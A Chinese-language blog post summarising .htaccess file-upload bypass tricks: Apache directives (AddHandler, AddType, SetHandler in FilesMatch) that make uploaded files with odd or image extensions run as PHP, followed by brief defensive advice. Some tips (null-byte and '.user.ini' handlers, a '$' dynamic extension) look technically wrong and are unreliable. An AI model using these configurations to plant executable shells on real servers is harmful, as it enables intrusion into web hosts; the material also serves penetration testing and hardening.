.htaccess 文件上传漏洞绕过总结

.htaccess 文件上传漏洞绕过总结

核心原理

通过 .htaccess 文件修改服务器配置,将非常规扩展名解析为可执行脚本(如 PHP),绕过文件上传黑名单限制。


一、关键配置指令(图片内容分析)

图片中列出的扩展名MIME 类型可直接用于绕过:

apache 复制代码
# 将扩展名映射到 PHP 解析器
AddHandler application/x-httpd-php .rhtml .phtml .pht .phps .php3 .php3p .php4 .php5

# 或使用 AddType
AddType application/x-httpd-php .phtml .php3 .phps

二、扩展绕过技巧(实战增强)

1. 非常规扩展名
apache 复制代码
AddHandler application/x-httpd-php .abc .xyz .shell .test

效果 :上传 shell.abc 会被当作 PHP 执行。

2. 双扩展名绕过
apache 复制代码
AddHandler application/x-httpd-php .jpg.xyz

效果image.jpg.xyz 会被解析为 PHP。

3. 空字节截断(旧系统)
apache 复制代码
AddHandler application/x-httpd-php .php%00

效果 :上传 shell.php%00.jpg 可能被解析为 PHP(需 PHP<5.3)。

4. 大小写混淆
apache 复制代码
AddHandler application/x-httpd-php .PhP5 .pHtML

效果 :绕过对 php 的大小写检查。

5. 特殊前缀/后缀
apache 复制代码
AddHandler application/x-httpd-php .user.ini

效果 :利用 .user.iniauto_prepend_file 执行代码。


三、MIME 类型绕过

apache 复制代码
# 伪造图片 MIME 类型
AddType application/x-httpd-php .jpg .png

# 或直接覆盖默认类型
RemoveHandler .jpg
AddHandler application/x-httpd-php .jpg

四、高级组合技

1. 嵌套解析绕过
apache 复制代码
<FilesMatch "\.hack$">
  SetHandler application/x-httpd-php
</FilesMatch>

效果 :所有 .hack 文件被解析为 PHP。

2. 动态扩展名
apache 复制代码
AddHandler application/x-httpd-php ."$"

效果:利用环境变量动态生成扩展名(需服务器支持)。


五、防御建议(管理员视角)

  1. 禁用 .htaccess 覆盖

    apache 复制代码
    AllowOverride None
  2. 限制上传目录执行权限

    apache 复制代码
    <Directory "/uploads">
       php_flag engine off
    </Directory>
  3. 严格文件类型检查

    • 使用白名单验证扩展名 + MIME 类型 + 文件头签名。

总结流程图

复制代码
上传 .htaccess 文件
  │
  ├── 添加恶意扩展名(.phtml, .php5)
  │
  ├── 伪造 MIME 类型(image/jpg → PHP)
  │
  └── 上传伪装文件(shell.jpg.php5)
       │
       └── 服务器解析执行

通过灵活组合扩展名、MIME 类型和服务器配置规则,可绕过大多数基于黑名单的文件上传防护。

相关推荐
上海控安8 小时前
上海控安:WiFi网络安全攻击
安全·web安全
張萠飛10 小时前
如何在实际应用中选择Blaze或Apache Gluten?
apache
Narutolxy10 小时前
DMZ层Nginx TLS 终止与安全接入配置实战20250829
redis·nginx·安全
杯莫停丶11 小时前
使用Java实现PDF文件安全检测:防止恶意内容注入
java·安全·pdf
OpenCSG14 小时前
【活动回顾】“智驱未来,智领安全” AI+汽车质量与安全论坛
人工智能·安全·汽车
独行soc14 小时前
2025年渗透测试面试题总结-38(题目+回答)
android·安全·网络安全·面试·职场和发展·渗透测试·求职
Amber_3715 小时前
深入理解Go 与 PHP 在参数传递上的核心区别
android·golang·php
柠檬茶AL16 小时前
37 HTB Remote 机器 - 容易
网络安全
wanhengidc17 小时前
七夕 云手机:浪漫时光里的科技陪伴
运维·科技·安全·游戏·智能手机
洞见前行18 小时前
Android第一代加固技术原理详解(附源码)
android·安全